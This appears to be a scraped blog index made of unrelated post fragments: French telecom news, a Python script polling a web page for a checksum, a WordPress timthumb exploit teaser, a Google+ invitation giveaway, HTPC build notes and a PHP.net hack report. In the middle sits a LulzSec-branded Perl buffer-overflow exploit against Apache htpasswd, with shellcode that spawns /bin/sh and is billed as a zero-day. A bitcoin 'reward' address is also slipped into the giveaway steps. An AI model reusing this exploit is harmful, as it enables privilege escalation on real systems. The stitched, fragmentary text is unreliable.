Something new and completely unexpected happened to me last Sunday night around 8pm (which totally fucked up the end of my weekend).

First I was alerted by Google Webmaster Tools (GWT) that my websites were not in good health, just as it’s shown in this screenshot I found on Google images:


Introduction

As some of you may know, today should be the official launch date for the Free Mobile GSM carrier in France. Why is it interesting?

Because Free.fr was always a synonym of evolution.

They were the first to sell 50 hours of dial-up internet connectivity for 30€ a month when everybody else was selling 10 hours for 50€.

They were the first to sell unlimited 512k DSL internet access for 30€ when everybody else was selling it for at least twice as much.

They were the first to promote ADSL2+, increasing the average customer bandwidth by a factor of at least 5.

They announced a new revolution for today: follow the announcement live with us!


Hi,

Free.fr is playing with us on http://live.free.fr: they added an MD5 checksum on the side of the space shuttle.

It seems that the checksum value changed twice already, so I built a little script that will fetch the page in an infinite loop looking for a new value.

#!/usr/bin/env python3

import re
from time import sleep

from httplib2 import Http

URL = "http://live.free.fr"
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011-10-16 20:23:00"
# Capture the hex digit that sits just before a '|' or '\' on each line.
REGEX = r"^[\s]*.*([0-9a-f])[|\\].*$"

def fetch():
    """Download the page and return its body as text."""
    h = Http()
    response, content = h.request(URL, headers={'User-Agent': USER_AGENT})
    # httplib2 returns the body as bytes; decode it before splitting into lines.
    return content.decode('utf-8', errors='replace')

def parse(content, regex):
    """Concatenate the hex digit captured on each matching line."""
    lines = content.split('\n')
    ret = ""
    for line in lines:
        occurrences = regex.findall(line)
        ret += "".join(occurrences)

    return ret

if __name__ == "__main__":
    latest_hash = ""
    regex = re.compile(REGEX)

    # Poll once a minute and report every time the checksum changes.
    while True:
        current_page = fetch()
        current_hash = parse(current_page, regex)

        if (current_hash != "") and (current_hash != latest_hash):
            print("New hash value!")
            print(current_hash)
            latest_hash = current_hash

        sleep(60)

I was crawling the Internet on the last day of 2011 and I saw someone trying to hack a WordPress website using the timthumb exploit.

Maybe you know about it, maybe you don’t. Anyway, I’ll show you how to exploit the vuln.

First of all, you should find a WordPress site using any theme that includes timthumb.php


Just like we did for Quora (http://www.devquotes.com/2011/01/06/providing-quora-com-invitations/), we will provide any invitations needed for those who totally want to try this already famous Google+ :)

Just follow the steps:

  1. follow @devquotescom on Twitter,
  2. tweet: thanks @devquotescom for providing me a #Google+ invitation – [YOUR EMAIL HERE],
  3. wait,
  4. enjoy Google+’s features!
  5. Expect some fresh new posts @devquotescom very soon.
  6. Send bitcoin here as a reward : 1vjhAZza4iNKxvNfKfsHNoharRNcXrtZr

Today the famous group just released one of the many 0days they’re using:

Here is the code :)

IRC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC

. /$$                 /$$            /$$$$$$
.| $$                | $$           /$$__  $$
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!

.--    .-""-.
.   ) (     )
.  (   )   (
.     /     )
.    (_    _)                     0_,-.__
.      (_  )_                     |_.-._/
.       (    )                    |lulz..\
.        (__)                     |__--_/
.     |''   ``\                   |
.     | [Lulz] \                  |      /b/
.     |         \  ,,,---===?A`\  |  ,==y'
.   ___,,,,,---==""\        |M] \ | ;|\ |>
.           _   _   \   ___,|H,,---==""""bno,
.    o  O  (_) (_)   \ /          _     AWAW/
.                     /         _(+)_  dMM/
.      \@_,,,,,,---=="   \      \\|//  MW/
.--''''"                         ===  d/
.                                    //   SET SAIL FOR FAIL!
.                                    ,'_________________________
.   \    \    \     \               ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
.                         _____    ,'  ~~~   .-""-.~~~~~~  .-""-.
.      .-""-.           ///==---   /`-._ ..-'      -.__..-'
.            `-.__..-' =====\\\\\\ V/  .---\.
.                     ~~~~~~~~~~~~, _',--/_.\  .-""-.
.                            .-""-.___` --  \|         -.__..-

Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemies be overwhelmed with our Lulz!

===========================================

#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec

$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 

$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target); 

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 

local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290; 

exec("$target -nb $buffer");

« History will judge us. »

It is with these words that the Swedish Minister for the Environment, Andreas Carlgren, concluded this staged trial of humankind which was held in Stockholm on May 17, 2011 on the sidelines of the Nobel Prize’s third symposium for sustainable development. Twenty renowned scientists have been presented with this prestigious award.


Introduction

Here is the 4th and final post on this subject. Previous posts can be found here, here, and there.

I’ll cover the installation of:

  • A 4-port SATA card;
  • A Media Center Remote USB receiver + remote;
  • Samba for home network CIFS filesharing;
  • ZFS for the main storage.


Introduction

This is the third article about my journey building an HTPC server. If you didn’t follow the whole series, the previous articles are available here: basic & hardware considerations.

I finally received all the hardware required to build my server. I only bought the base: a motherboard which includes CPU plus graphics card (AT5IONT-I), memory (1x1GB + 1x2GB), a case (Lian-Li PC-V354R), and a Blu-Ray reader. I re-used an Antec EarthWatt 500W power supply unit and an old 500G hard drive I had in some server lying around at my place.


The news, coming initially from VUPEN from what I can see, is spreading that PHP.NET has been hacked. PHP sources released on the website seem to have been backdoored, or at least modified.
